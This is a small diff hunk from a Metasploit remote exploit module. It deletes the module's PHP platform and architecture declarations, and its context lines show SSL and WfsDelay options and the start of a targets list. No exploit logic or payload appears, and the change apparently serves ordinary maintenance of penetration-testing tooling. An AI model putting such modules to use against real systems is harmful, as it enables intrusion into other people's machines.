@@ -40,8 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => false,
           'WfsDelay' => 5
         },
-        'Platform' => [ 'php' ],
-        'Arch' => [ ARCH_PHP ],
         'Targets' => [
           [
             'Auto',
